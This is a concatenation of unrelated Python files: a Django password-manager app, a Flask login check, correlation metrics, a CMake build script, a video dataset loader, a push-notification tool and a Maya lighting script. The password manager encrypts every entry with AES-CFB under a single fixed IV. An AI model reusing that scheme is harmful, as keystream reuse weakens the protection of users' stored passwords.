            obj.pw = cipher.decrypt(bytes.fromhex(obj.pw)).decode('utf-8')
        context = {
            'data': data,
        }
    return HttpResponse(template.render(context, request))
@login_required
def edit(request, id):
    """Edit a stored password entry; can also suggest a generated password.

    POST actions: 'GenerateSubmit' builds a password suggestion (optionally
    weaving comma-separated personal details into it) and 'EditSubmit'
    re-encrypts and persists the new password.

    Fixes over the original: removed the dead editform/generateform
    assignments (one of which used the wrong 'add' prefix), deduplicated the
    charset construction, guarded the randint(0, -1) crash when the personal
    details exactly fill the requested length, and added the same ownership
    check del_pw already performs (any logged-in user could previously read
    or edit any entry by id).
    """

    def _build_charset(data):
        # Assemble the allowed alphabet from the form's checkbox options.
        charset = ''
        if data['use_lower']:
            charset += string.ascii_lowercase
        if data['use_upper']:
            charset += string.ascii_uppercase
        if data['use_digits']:
            charset += string.digits
        if data['use_special']:
            charset += string.punctuation
        if data['avoid_similar']:
            # Drop visually ambiguous characters (o/O/0, I/l/1, ...).
            charset = [c for c in charset if c not in similar_chars]
        return charset

    password = 'Generated password'
    length = 8
    # The AES key/IV only exist in the session after verify_pw succeeds.
    if 'cipherKey' not in request.session:
        return redirect('verify_pw')
    if request.method == 'POST' and 'GenerateSubmit' in request.POST:
        generateform = GeneratePasswordForm(request.POST or None, prefix='generate')
        if generateform.is_valid():
            data = generateform.cleaned_data
            length = data['length']
            personal_str = data['personal_details']
            # check if personal details were included
            if personal_str != '':
                # from the string, get list with each word as an item
                personal_lst = str(personal_str).split(",")
                # Character count of the personal words, commas excluded.
                personal_length = len(personal_str) - personal_str.count(",")
                # check if number of characters in personal details exceeds length set
                if personal_length > length:
                    password = "Length of personal details exceed password length!"
                else:
                    charset = _build_charset(data)
                    # Generate the random part, then splice each personal
                    # word in at a random position.
                    before_password = get_random_string(length - personal_length, charset)
                    for item in personal_lst:
                        # Guard the empty case: randint(0, -1) would raise.
                        pos = randint(0, len(before_password) - 1) if before_password else 0
                        before_password = "".join((before_password[:pos], item, before_password[pos:]))
                    password = before_password
            else:
                password = get_random_string(length, _build_charset(data))
    obj = Passwords.objects.get(id=id)
    # Access control: only the owner may view or edit this entry
    # (mirrors the ownership check in del_pw).
    if obj.user.id != request.user.id:
        return HttpResponse('No Permission')
    if request.method == 'POST' and 'EditSubmit' in request.POST:
        editform = EditPasswordForm(request.POST, prefix='edit')
        if editform.is_valid():
            # CFB mode keeps internal state: build a fresh cipher per operation.
            encryption_suite = AES.new(bytes.fromhex(request.session.get('cipherKey')), AES.MODE_CFB, bytes.fromhex(request.session.get('iv')))
            obj.pw = encryption_suite.encrypt(editform.cleaned_data['npw'].encode('utf-8')).hex()
            obj.save()
            return redirect('/password/')
        else:
            return render(request, 'password/edit.html', {'obj': obj, 'edit_form': editform})
    # Decrypt the stored password so the template can show the current value.
    encryption_suite = AES.new(bytes.fromhex(request.session.get('cipherKey')), AES.MODE_CFB, bytes.fromhex(request.session.get('iv')))
    obj.pw = encryption_suite.decrypt(bytes.fromhex(obj.pw)).decode('utf-8')
    extra_context = {
        'edit_form': EditPasswordForm(prefix='edit'),
        'generate_form': GeneratePasswordForm(prefix='generate'),
        'password': password,
        'length': length,
        'obj': obj,
    }
    return render(request, 'password/edit.html', extra_context)
@login_required
def add_pw(request):
    """Create a new password entry; can also suggest a generated password.

    POST actions: 'GenerateSubmit' builds a password suggestion (optionally
    weaving comma-separated personal details into it) and 'AddSubmit'
    encrypts and stores a new entry for the current user.

    Fixes over the original: removed the dead addform/generateform
    assignments (the rendered context always builds fresh forms anyway),
    deduplicated the charset construction, and guarded the randint(0, -1)
    crash when the personal details exactly fill the requested length.
    """

    def _build_charset(data):
        # Assemble the allowed alphabet from the form's checkbox options.
        charset = ''
        if data['use_lower']:
            charset += string.ascii_lowercase
        if data['use_upper']:
            charset += string.ascii_uppercase
        if data['use_digits']:
            charset += string.digits
        if data['use_special']:
            charset += string.punctuation
        if data['avoid_similar']:
            # Drop visually ambiguous characters (o/O/0, I/l/1, ...).
            charset = [c for c in charset if c not in similar_chars]
        return charset

    password = 'Generated password'
    length = 8
    # The AES key/IV only exist in the session after verify_pw succeeds.
    if 'cipherKey' not in request.session:
        return redirect('verify_pw')
    if request.method == 'POST' and 'GenerateSubmit' in request.POST:
        generateform = GeneratePasswordForm(request.POST or None, prefix='generate')
        if generateform.is_valid():
            data = generateform.cleaned_data
            length = data['length']
            personal_str = data['personal_details']
            # check if personal details were included
            if personal_str != '':
                # from the string, get list with each word as an item
                personal_lst = str(personal_str).split(",")
                # Character count of the personal words, commas excluded.
                personal_length = len(personal_str) - personal_str.count(",")
                # check if number of characters in personal details exceeds length set
                if personal_length > length:
                    password = "Length of personal details exceed password length!"
                else:
                    charset = _build_charset(data)
                    # Generate the random part, then splice each personal
                    # word in at a random position.
                    before_password = get_random_string(length - personal_length, charset)
                    for item in personal_lst:
                        # Guard the empty case: randint(0, -1) would raise.
                        pos = randint(0, len(before_password) - 1) if before_password else 0
                        before_password = "".join((before_password[:pos], item, before_password[pos:]))
                    password = before_password
            else:
                password = get_random_string(length, _build_charset(data))
    if request.method == 'POST' and 'AddSubmit' in request.POST:
        addform = PasswordForm(request.POST, prefix='add')
        if addform.is_valid():
            # CFB mode keeps internal state: build a fresh cipher per operation.
            encryption_suite = AES.new(bytes.fromhex(request.session.get('cipherKey')), AES.MODE_CFB, bytes.fromhex(request.session.get('iv')))
            s = Passwords()
            s.userid = addform.cleaned_data['userid']
            s.pw = encryption_suite.encrypt(addform.cleaned_data['pw'].encode('utf-8')).hex()
            s.web = addform.cleaned_data['web']
            s.email = addform.cleaned_data['email']
            s.user = request.user
            s.save()
            return redirect('/password/')
    # NOTE(review): as in the original, an invalid AddSubmit falls through to
    # fresh unbound forms, so field errors are never shown -- TODO surface them.
    extra_context = {
        'add_form': PasswordForm(prefix='add'),
        'generate_form': GeneratePasswordForm(prefix='generate'),
        'password': password, 'length': length,
    }
    return render(request, 'password/add_pw.html', extra_context)
@login_required
def del_pw(request, id):
    """Confirm and delete one stored password entry.

    GET renders a confirmation page for the entry; POST deletes it when
    it belongs to the requesting user, otherwise answers 'No Permission'.
    """
    entry = Passwords.objects.get(id=id)
    if request.method != 'POST':
        return render(request, "password/del_pw.html", {'object': entry})
    # Only the owner may delete their own entry.
    if entry.user.id != request.user.id:
        return HttpResponse('No Permission')
    entry.delete()
    return redirect('../../')
similar_chars = {'o', 'O', '0', 'I', 'l', '1', '|'}
def generate_pw(request):
    """Render the standalone password-generator page.

    On an invalid/absent form submission shows a placeholder; otherwise
    builds a character set from the selected options and returns a random
    password of the requested length.
    """
    form = GeneratePasswordForm(request.POST or None)
    if not form.is_valid():
        context = {'password' : 'Your password will show here', 'length': 12, 'form': form}
    else:
        data = form.cleaned_data
        charset = ''
        if data['use_lower']:
            charset += string.ascii_lowercase
        if data['use_upper']:
            charset += string.ascii_uppercase
        if data['use_digits']:
            charset += string.digits
        if data['use_special']:
            charset += string.punctuation
        if data['avoid_similar']:
            charset = [c for c in charset if c not in similar_chars]
        # Bug fix: with every character class deselected the charset was
        # empty and get_random_string raised; fall back to lowercase.
        if not charset:
            charset = string.ascii_lowercase
        length = data['length']
        password = get_random_string(length, charset)
        context = {'password': password, 'length': length, 'form': form}
    return render(request, 'password/generate_pw.html', context)
@login_required
def verify_pw(request):
    """Re-authenticate the user and derive the AES session key material.

    On a correct password, 48 bytes are derived via PBKDF2 from the
    password and the salt embedded in the stored Django password hash;
    the first 16 bytes become the AES-CFB IV and the remaining 32 the
    cipher key, both stored hex-encoded in the session before redirecting
    to /password/. On failure an error message is flashed and the form is
    re-rendered.
    """
    if request.method == 'POST':
        if check_password(request.POST.get("Password"), request.user.password):
            # Django password hashes look like 'algorithm$iterations$salt$hash'.
            _, _, salt, _ = request.user.password.split('$')
            key = pbkdf2(request.POST.get("Password"), salt, 50000, 48)
            # key[:16] -> IV, key[16:] -> 32-byte AES key (hex in session).
            request.session['iv'] = key[0:16].hex()
            request.session['cipherKey'] = key[16:].hex()
            return redirect('/password/')
        else:
            messages.error(request, 'Incorrect Password')
    return render(request, "password/verify_pw.html", {})
@login_required
def search(request):
    """Fuzzy-search the user's stored passwords by site name.

    Uses trigram similarity on the 'web' field (threshold 0.1), decrypts
    each matching entry's password with the AES key held in the session,
    and renders the results.
    """
    if request.method == 'GET':
        query = request.GET.get('q')
        # Bug fix: a missing/empty 'q' parameter previously reached
        # TrigramSimilarity with None and raised; render an empty page.
        if not query:
            return render(request, 'password/search.html', {})
        results = Passwords.objects.filter(user = request.user)
        results = results.annotate(similarity = TrigramSimilarity('web', query)).filter(similarity__gt = 0.1).order_by('-similarity')
        for obj in results:
            # Fresh cipher per record: CFB mode is stateful, so a suite
            # cannot be reused across independent ciphertexts.
            encryption_suite = AES.new(bytes.fromhex(request.session.get('cipherKey')), AES.MODE_CFB, bytes.fromhex(request.session.get('iv')))
            obj.pw = encryption_suite.decrypt(bytes.fromhex(obj.pw)).decode('utf-8')
        return render(request, 'password/search.html', {'results':results})
    else:
        return render(request, 'password/search.html', {})
@login_required
def change_pw(request):
    """Change the account password and re-encrypt all stored passwords.

    Each saved password is AES-encrypted under a key derived from the
    login password, so after a successful change every entry is decrypted
    with the old session key and re-encrypted with a key derived from the
    new password; the user is then logged out to re-authenticate.
    """
    if request.method == 'POST' and request.user.is_authenticated:
        if 'cipherKey' not in request.session:
            # Cannot re-encrypt without the current key; force re-verify.
            return redirect('verify_pw')
        form = PasswordChangeForm(request.user, request.POST)
        if form.is_valid():
            user = form.save()
            # Keep the current session valid after the password change.
            update_session_auth_hash(request, user)
            data = Passwords.objects.filter(user = request.user)
            # New salt comes from the freshly saved password hash
            # ('algorithm$iterations$salt$hash').
            _, _, salt, _ = user.password.split('$')
            pw = form.cleaned_data['new_password1']
            key = pbkdf2(pw, salt, 50000, 48)
            # key[16:] -> 32-byte AES key, key[:16] -> IV.
            key,iv = key[16:], key[0:16]
            for obj in data:
                # Fresh cipher per record: CFB mode is stateful and must
                # not be reused across records.
                encryption_suite = AES.new(bytes.fromhex(request.session.get('cipherKey')), AES.MODE_CFB, bytes.fromhex(request.session.get('iv')))
                obj.pw = encryption_suite.decrypt(bytes.fromhex(obj.pw)).decode('utf-8')
                new_encryption_suite = AES.new(key, AES.MODE_CFB, iv)
                obj.pw = new_encryption_suite.encrypt(obj.pw.encode('utf-8')).hex()
                obj.save()
            logout(request)
            return redirect('login')
        else:
            return render(request, 'password/change_pw.html', {'password_change_form' : form})
    else:
        form = PasswordChangeForm(request.user)
    return render(request, 'password/change_pw.html', {'password_change_form' : form})
|
import sqlite3
from app import app
# Bug fix: 'from flask import flask' raises ImportError (flask exports no
# lowercase 'flask' name); the commented routes below use
# flask.render_template, so import the module itself.
import flask
from flask import redirect, render_template
from view import checkLogin
"""
@app.route('/login')
def login():
return flask.render_template("login.html")
@app.route('/Sign Up')
def auth_user():
return flask.render_template("auth_user.html")
"""
def validate(request):
    """Check the submitted credentials via checkLogin: redirect home on
    success, otherwise re-render the login page with an error message."""
    if checkLogin(request) != 1:
        return render_template("login.html", error='UserId or password Incorrect')
    return redirect('/')
"""
Implements Lovell's correlation metric
"""
from __future__ import division
import numpy as np
from composition import clr
def lovellr(x, y):
    """
    Calculates proportional goodness of fit

    Parameters
    ----------
    x : array_like
    y : array_like

    Returns
    -------
    float : proportional goodness of fit

    Notes
    -----
    Bug fix: the body referenced _x/_y which were only defined in
    commented-out code, so every call raised NameError. The commented
    zero-dropping + clr transformation is restored.
    """
    x, y = np.array(x), np.array(y)
    # The clr transform takes logarithms, so positions where either
    # composition is zero must be dropped first.
    idx = np.logical_and(x > 0, y > 0)
    m = np.vstack((x[idx], y[idx])).T
    _x, _y = clr(m).T
    return np.var(_x - _y) / np.var(_x)
def zhengr(x, y):
    """
    Calculates proportional correlation coefficient

    Parameters
    ----------
    x : array_like
    y : array_like

    Returns
    -------
    float : proportional correlation coefficient
    """
    _x = np.array(x)
    _y = np.array(y)
    # NOTE: zero-dropping and clr transformation of the inputs are
    # currently disabled; the statistic is computed on the raw values.
    pairwise_cov = np.cov(_x, _y)[1, 0]
    return 2 * pairwise_cov / (np.var(_x) + np.var(_y))
def get_corr_matrix(mat, func):
    """
    Generates a correlation matrix

    Parameters
    ----------
    mat : np.array
        Contingency table
        columns = OTUs
        rows = samples
    func : function
        correlation function

    Returns
    -------
    np.array :
        correlation matrix (symmetric; the diagonal is left at zero)
    """
    n_cols = mat.shape[1]
    corr_mat = np.zeros((n_cols, n_cols))
    # Fill the strictly-lower triangle, then mirror it.
    for i in range(n_cols):
        for j in range(i):
            corr_mat[i, j] = func(mat[:, i], mat[:, j])
    return corr_mat + corr_mat.T
|
#!/usr/bin/env python
# Copyright 2016 Udey Rishi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import shutil
import os
from subprocess import call
import sys
if __name__ == '__main__':
    # Command-line driver: configure and run a CMake + make build of the
    # Logic project into out/<debug|release>.
    parser = argparse.ArgumentParser('Build Logic and LogicTests')
    parser.add_argument('-d', '--debug', help='Build the debug version', action='store_true')
    parser.add_argument('-r', '--rebuild', help='Clean before building', action='store_true')
    args = parser.parse_args()
    if args.rebuild:
        try:
            shutil.rmtree('out')
        except OSError:
            # 'out' may not exist yet; building from scratch is fine.
            pass
    build_type = 'debug' if args.debug else 'release'
    out_dir = os.path.join('out', build_type)
    if not os.path.exists(out_dir):
        os.makedirs(out_dir)
    os.chdir(out_dir)
    cmake_args = ['cmake', '-DCMAKE_BUILD_TYPE=' + build_type]
    if 'COMPILER' in os.environ:
        # Allow CI to override the C++ compiler via the COMPILER env var.
        cmake_args.append('-DCMAKE_CXX_COMPILER=' + os.environ['COMPILER'])
    cmake_args.append('../..')
    code = call(cmake_args)
    if code:
        # Propagate the cmake failure status as this script's exit code.
        exit(code)
    code = call(['make'])
    if code:
        exit(code)
|
import os
import logging
import pandas as pd
# from ASF.datasets.data_utils import read_tuple
logger = logging.getLogger(__name__)
# Subject IDs held out for testing; every other subject is mapped to the
# single remaining (training) split by get_mpii_cooking_dataset below.
testing_subjects = [8, 10, 16, 17, 18, 19, 20]
def get_mpii_cooking_dataset(**kwargs):
    """Build per-video annotation records for the MPII Cooking dataset.

    Reads the detection ground-truth CSV, groups rows by (file_name,
    subject), and returns (dataset_dict, metadata) where dataset_dict is
    a list of {video_path, annotations, video_len, split} entries and
    annotations are (activity_name, start_frame, end_frame) tuples sorted
    by start frame. **kwargs override the default metadata values.
    """
    # [act, start (0-base), end (0-base, not included)]
    metadata = {
        # "video_root": './data/mpii/videos/videos',
        "video_root": './data/mpii/videos/mp4',
        "gt_root": './data/mpii/detectionGroundtruth-1-0.csv',
        "mapping_file": './data/mpii/mapping_mpii.txt',
        "n_splits": len(testing_subjects),
    }
    metadata.update(kwargs)
    df = pd.read_csv(
        metadata['gt_root'],
        names=["subject", 'file_name', 'start_frame', 'end_frame', 'activity_category_id', 'activity_category_name'])
    # Convert the CSV's 1-based start frames to 0-based.
    df['start_frame'] -= 1
    gb_df = df.groupby(['file_name', 'subject'])
    new_df = gb_df['activity_category_name'].apply(list).to_frame(name='activity_category_name')
    new_df['start_frame'] = gb_df['start_frame'].apply(list)
    new_df['end_frame'] = gb_df['end_frame'].apply(list)
    dataset_dict = []
    for row in new_df.reset_index().itertuples():
        # Sort segments by start frame (first tuple element), then drop
        # the sort key, leaving (activity_name, start_frame, end_frame).
        gt = list(zip(row.start_frame, row.activity_category_name, row.start_frame, row.end_frame))
        gt = [g[1:] for g in sorted(gt)]
        dataset_dict.append({
            # "video_path": os.path.join(metadata['video_root'], f'{row.file_name}.avi'),
            "video_path": os.path.join(metadata['video_root'], f'{row.file_name}.mp4'),
            "annotations": gt,
            # NOTE(review): end frame of the segment with the latest
            # *start*; assumes that segment also ends last — confirm.
            "video_len": gt[-1][-1],
            # Held-out subjects get split indices 0..N-1; everyone else
            # shares the final (training) split index.
            "split": testing_subjects.index(row.subject) if row.subject in testing_subjects else len(testing_subjects),
        })
    return dataset_dict, metadata
|
# --------------------------------------------------------------------
import os
# --------------------------------------------------------------------
def tri_recursion (k):
    """Return the k-th triangular number (0 for k <= 0), printing each
    partial sum as the recursion unwinds."""
    if k <= 0:
        return 0
    total = k + tri_recursion (k - 1)
    print (total)
    return total
print ("\n\nRecursion Example Results")
tri_recursion (6)
# --------------------------------------------------------------------
# Windows-only: keep the console window open until a key is pressed.
os.system ("pause")
|
print("Exercise") |
import requests
# from urllib.parse import quote_plus
from seaweed.settings import BASE_DIR
import os
from collections import OrderedDict
from urllib.parse import quote_plus
import time
from collections import ChainMap
# Platform line separator used to split the raw HTTP template files; a
# blank line (two separators) divides the header section from the body.
two_seps = os.linesep * 2
sep = os.linesep
class Dict(dict):
    """A dict whose keys are also readable as attributes (d.key == d['key'])."""
    # def __getattribute__(self, key):
    #     return self[key]

    def __getattr__(self, key):
        # Bug fix: __getattr__ must raise AttributeError (not KeyError)
        # for missing names so hasattr()/getattr(obj, name, default)
        # behave correctly.
        try:
            return self[key]
        except KeyError:
            raise AttributeError(key)
def headers_to_dict(h):
    """Parse raw 'Name: value' header (or form-data) lines, separated by
    os.linesep, into a plain dict; surrounding whitespace on each value
    is stripped."""
    parsed = {}
    for line in h.split(sep):
        name, value = line.split(':', 1)
        parsed[name] = value.strip()
    return parsed
def data_to_list(data):
    """Split 'key:value' lines (separated by os.linesep) into a list of
    mutable [key, value] pairs, preserving the original line order."""
    pairs = []
    for line in data.split(sep):
        key, value = line.split(":", 1)
        pairs.append([key, value])
    return pairs
def order_dict(d, order_d):
    """Return an OrderedDict of d's entries for the keys of order_d,
    ordered by order_d's (numeric) values ascending."""
    ordered_keys = sorted(order_d, key=order_d.get)
    return OrderedDict((k, d[k]) for k in ordered_keys)
def parse_text(file):
    """Parse a raw-HTTP template *file* into (method, url, headers, body).

    The file is UTF-8 text: a request line, header lines, a blank line,
    then 'key:value' body lines. headers is a dict; body is an ordered
    list of [key, value] pairs.
    """
    file_str = ''
    with open(file, 'rb') as f:
        file_str = f.read().decode('utf-8')
    # Blank line separates headers from the body section.
    lhs = file_str.split(two_seps)
    body = data_to_list(lhs[1])
    # First line is the request line; the rest are headers.
    lh = lhs[0].split(sep, 1)
    headers = headers_to_dict(lh[1])
    line = lh[0].split(' ')
    method = line[0]
    if line[1].startswith('http'):
        url = line[1]
    else:
        # url = 'https://' + headers['Host'] + line[1]
        # Xiaomi changed the host from dev.xiaomi.com to dev.mi.com, so
        # the Host header in the templates is stale; the correct host is
        # hard-coded here instead.
        url = 'https://' + 'dev.mi.com' + line[1]
    return method, url, headers, body
def get_expire():
    """Return an expiry timestamp ~1000 seconds from now, expressed in
    milliseconds since the epoch, as a decimal string."""
    expire_at = time.time() + 1000
    return str(int(expire_at * 1000))
class PushForbiddenException(Exception):
    """Raised when a push template is malformed or the push is not
    allowed (e.g. a broadcast against a production app id)."""
    pass
class Push(object):
    """One push-notification request built from a raw-HTTP template file.

    Template names encode platform and environment (see the APPID tables
    below): first letter 'a' = Android, 'i' = iOS; third letter 'p' =
    production app, 't' = test app. The request body is kept as an
    ordered list of [key, value] pairs so it can be re-serialized in the
    template's original field order.
    """
    # Directory containing the raw-HTTP push templates.
    DIR = os.path.join(BASE_DIR, 'push.conf')
    # Earlier index/order layouts, kept for reference:
    # ANDROID_INDEX = {"expires": 14, "title": 5,
    # "description": 6, "payload": 10, "target": 7}
    # IOS_INDEX = {"expires": 11, "category": 4, "description": 1,
    # "id": 5, "target": 6}
    # ANDROID_ORDER = {"expires": 5, "title": 1,
    # "description": 2, "payload": 3, "target": 4}
    # IOS_ORDER = {"expires": 56, "id": 4,
    # "description": 2, "category": 3, "target": 5}
    # *_INDEX: position of each logical field inside self.body.
    # *_ORDER: display order used by get_fields().
    # *_EXPIRES: position of the expiry timestamp field.
    ANDROID_INDEX = {"title": 5, "description": 6,
                     "payload": 10, "target": 7, "apiType": 8}
    IOS_INDEX = {"category": 4, "description": 1,
                 "id": 5, "target": 6, "apiType": 7}
    ANDROID_ORDER = {"title": 1, "description": 2, "payload": 3, "target": 4}
    IOS_ORDER = {"id": 4, "description": 2, "category": 3, "target": 5}
    ANDROID_EXPIRES = {"expires": 14}
    IOS_EXPIRES = {"expires": 11}
    PRODUCT_APPIDS = {'amp': '1008284',
                      'avp': '1005286',
                      'imp': '2882303761517418140',
                      'ivp': '2882303761517421667'}
    TEST_APPIDS = {'amt': '2882303761517414257',
                   'avt': '2882303761517473392',
                   'imt': '2882303761517469186',
                   'ivt': '2882303761517473393'}

    def __init__(self, file):
        """Parse the template named *file* inside Push.DIR and validate it."""
        self.fname = file
        # self.fname = os.path.split(os.path.abspath(file))[1]
        # Only Android ('a...') and iOS ('i...') templates are supported.
        assert self.fname.startswith('i') or self.fname.startswith('a')
        result = parse_text(os.path.join(Push.DIR, file))
        self.method, self.url, self.headers, self.body = result[
            0], result[1], result[2], result[3]
        self.check_template()

    def update_body(self, dct):
        """Overwrite the body fields named in *dct* and refresh the
        expiry timestamp; returns self for chaining."""
        if dct:
            for d in dct:
                if self.fname.startswith('a'):
                    self.body[Push.ANDROID_INDEX[d]][1] = dct[d]
                elif self.fname.startswith('i'):
                    self.body[Push.IOS_INDEX[d]][1] = dct[d]
        if self.fname.startswith('a'):
            self.body[Push.ANDROID_EXPIRES['expires']][1] = get_expire()
        if self.fname.startswith('i'):
            self.body[Push.IOS_EXPIRES['expires']][1] = get_expire()
        # Deleting the target row would shift the later indexes; leaving
        # it in place appears to have no ill effect, so it is kept.
        # if dct["apiType"] == "broadcast":
        #     # dct.pop("target")
        #     del self.body[Push.ANDROID_INDEX['target']]
        return self

    def get_fields(self):
        """Return the logical body fields as an OrderedDict in the
        platform's display order."""
        result = Dict()
        if self.fname.startswith('a'):
            for k, v in Push.ANDROID_INDEX.items():
                result[k] = self.body[v][1]
            return order_dict(result, Push.ANDROID_ORDER)
        else:
            for k, v in Push.IOS_INDEX.items():
                result[k] = self.body[v][1]
            return order_dict(result, Push.IOS_ORDER)

    def check_template(self):
        """Validate the template: 1) the file name's app id must appear
        in the request URL; 2) the body must have the fixed expected
        length. Raises PushForbiddenException otherwise."""
        all_appids = ChainMap(Push.TEST_APPIDS, Push.PRODUCT_APPIDS)
        aid = all_appids[self.fname[:3]]
        try:
            assert aid in self.url
        except AssertionError:
            raise PushForbiddenException(
                '{}: appid should be {}'.format(self.fname, aid))
        length = len(self.body)
        try:
            if self.fname.startswith('a'):
                assert length == 25
            else:
                assert length == 18
        except AssertionError:
            raise PushForbiddenException(
                '{}: illegal body length'.format(self.fname))
        print('perfect template: {}'.format(self.fname))

    def check_prod(self):
        """Refuse broadcast pushes against production app ids; only the
        'broadcast' and 'alias' apiTypes are recognized."""
        # broadcast not allowed in prod
        if self.fname.startswith('a'):
            t = self.body[Push.ANDROID_INDEX["apiType"]][1]
        else:
            t = self.body[Push.IOS_INDEX["apiType"]][1]
        if t == "broadcast":
            for k, v in Push.PRODUCT_APPIDS.items():
                if v in self.url:
                    raise PushForbiddenException('{} {}'.format(self.fname, v))
        elif t == "alias":
            pass
        else:
            print(self.body)
            raise PushForbiddenException('apiType index error: {}'.format(t))

    def request(self):
        """URL-encode the body, run the production safety check, send the
        request, and return the decoded JSON response."""
        body_str = ''
        for item in self.body:
            body_str = body_str + \
                quote_plus(item[0]) + "=" + quote_plus(item[1]) + "&"
        # Drop the trailing '&'.
        body_str = body_str[:-1]
        print('body: ' + body_str)
        self.check_prod()
        res = requests.request(self.method, self.url,
                               headers=self.headers, data=body_str)
        print('res: ' + res.text)
        # if res.json().get('errorCode') == 0:
        #     return "success"
        # return "fail"
        return res.json()

    @staticmethod
    def get_push_list(typ):
        """Return [{file_name: fields}, ...] for every template in
        Push.DIR whose name starts with *typ*."""
        files = [f for f in os.listdir(Push.DIR) if f.startswith(typ)]
        result = list()
        for file in files:
            result.append({file: Push(file).get_fields()})
        return result
|
import maya.mel as mel
import maya.cmds as cmds
from functools import partial
class RenegadeBaseSet(object):
    """Maya/VRay lighting utilities for the RenegadeBaseA_INT set
    (Python 2, maya.cmds/maya.mel). Creates Char_Algae light-select
    render elements, wires the algae lights into them, and manages
    per-render-layer enablement. UI entry point: algaeLights()."""

    def createLightSelects(self, *args):
        """Create the Char_Algae_S (type 3) and Char_Algae_D (type 2)
        VRay LightSelect render elements, disabled by default, and
        connect every matching algae light to both."""
        # creates Char_lgae_S render elements
        # NOTE(review): render_elements is assigned but never used.
        render_elements = cmds.ls(type="VRayRenderElement")
        mel.eval('vrayAddRenderElement LightSelectElement;')
        # The freshly added element comes back as the current selection.
        charAlgaeS_Sel = cmds.ls(selection=True)
        charAlgaeS_newName = cmds.rename(charAlgaeS_Sel[0], "Char_Algae_S")
        cmds.setAttr(charAlgaeS_newName + '.vray_name_lightselect',
                     'Char_Algae_S',
                     type='string')
        cmds.setAttr(charAlgaeS_newName + '.vray_type_lightselect', 3)
        cmds.setAttr(charAlgaeS_newName + '.enabled', 0)
        # creates Char_lgae_D render elements
        render_elements = cmds.ls(type="VRayRenderElement")
        mel.eval('vrayAddRenderElement LightSelectElement;')
        charAlgaeD_Sel = cmds.ls(selection=True)
        charAlgaeD_newName = cmds.rename(charAlgaeD_Sel[0], "Char_Algae_D")
        cmds.setAttr(charAlgaeD_newName + '.vray_name_lightselect',
                     'Char_Algae_D', type='string')
        cmds.setAttr(charAlgaeD_newName + '.vray_type_lightselect', 2)
        cmds.setAttr(charAlgaeD_newName + '.enabled', 0)
        # adding specific lights to render elements
        renBaseALights = cmds.ls('*:*:DTX_AlgaeGlow*:AlgaeLight_*')
        if renBaseALights == []:
            # No algae lights in the scene: nothing to wire up.
            self.complete()
        else:
            for i in range(0, (len(renBaseALights))):
                cmds.connectAttr((renBaseALights[i] + '.instObjGroups[0]'),
                                 (charAlgaeD_newName +
                                  '.dagSetMembers[' + str(i) + ']'))
                cmds.connectAttr((renBaseALights[i] + '.instObjGroups[0]'),
                                 (charAlgaeS_newName +
                                  '.dagSetMembers[' + str(i) + ']'))
            self.lightsOn(charAlgaeD_newName, charAlgaeS_newName,
                          renBaseALights)

    # function that runs through all the layers
    # and determines if it needs the light
    # select added or not
    def lightsOn(self, charAlgaeD_newName, charAlgaeS_newName, renBaseALights):
        """Walk every render layer, enabling both light-select elements
        (with per-layer adjustments on character layers) and adding the
        light shapes wherever the elements were still disabled."""
        current = cmds.editRenderLayerGlobals(query=True,
                                              currentRenderLayer=True)
        if current == 'masterLayer':
            cmds.editRenderLayerGlobals(currentRenderLayer='ST_RenegadeBaseA_INT_Day')
        for layer in cmds.ls(type='renderLayer'):
            if 'defaultRenderLayer' in layer:
                cmds.setAttr(charAlgaeS_newName + '.enabled', 1)
                cmds.setAttr(charAlgaeD_newName + '.enabled', 1)
            elif 'CH_' in layer:
                # Shadow and RGB character layers are left untouched.
                if '_Shadow' in layer:
                    pass
                elif '_RGB' in layer:
                    pass
                else:
                    print 'Character layer captured : %s' % (layer)
                    cmds.editRenderLayerGlobals(currentRenderLayer=layer)
                    # Per-layer override so enabling here does not leak
                    # into the other render layers.
                    cmds.editRenderLayerAdjustment(charAlgaeS_newName +
                                                   '.enabled')
                    cmds.editRenderLayerAdjustment(charAlgaeD_newName +
                                                   '.enabled')
                    cmds.setAttr(charAlgaeS_newName + '.enabled', 1)
                    cmds.setAttr(charAlgaeD_newName + '.enabled', 1)
            status = cmds.getAttr(charAlgaeD_newName + '.enabled')
            if status == 0:
                cmds.setAttr(charAlgaeS_newName + '.enabled', 1)
                cmds.setAttr(charAlgaeD_newName + '.enabled', 1)
                cur = cmds.editRenderLayerGlobals(query=True,
                                                  currentRenderLayer=True)
                cmds.select(renBaseALights)
                shapes = cmds.listRelatives(renBaseALights,
                                            allDescendents=True,
                                            type="shape")
                for i in shapes:
                    cmds.editRenderLayerMembers(cur, i, nr=True)
            else:
                pass
        self.complete()

    def topDownFillMover(self, *args):
        """Rotate every character fill-light control to point straight
        down on each CH_ render layer, then drop a 'Scene_Checked'
        marker locator."""
        characterCtrls = cmds.ls('*:*:DTX_LgtRg_Character_A:Lgt_Fill_Ctrl')
        for layer in cmds.ls(type='renderLayer'):
            if 'CH_' in layer:
                cmds.editRenderLayerGlobals(currentRenderLayer=layer)
                for ctrls in characterCtrls:
                    cmds.setAttr(ctrls + '.rotateY', 0)
                    cmds.setAttr(ctrls + '.rotateX', -90)
        cmds.spaceLocator(name='Scene_Checked')

    # UI created to aid artist in creation of Light Select Render Elements
    def algaeLights(self, *args):
        """Show the 'Algae Light Pass Creator' window (recreating it if
        one is already open)."""
        if cmds.window('algaeLights', exists=True):
            delete = cmds.deleteUI('algaeLights')
        algaeLights = cmds.window('algaeLights', t='Algae Light Pass Creator',
                                  s=False, mnb=False, mxb=False)
        cmds.columnLayout()
        cmds.frameLayout(label='RenegadeBaseA_INT', bgc=[0.6, 0.2, 0.2])
        cmds.separator(h=10, style='in')
        cmds.text(label='Fix for Known Issues with this Set', align='center')
        cmds.button('top_fill', label='Rotate Fill Lights',
                    c=partial(self.topDownFillMover), w=250, h=40)
        cmds.button('render_elements', label='Create Render Elements',
                    c=partial(self.createLightSelects), w=250, h=40)
        cmds.separator(h=10, style='none')
        cmds.setParent('..')
        cmds.showWindow(algaeLights)

    def complete(self, *args):
        """Close any helper windows the tool may have opened and show the
        completion dialog."""
        if cmds.window('complete', exists=True):
            delete = cmds.deleteUI('complete')
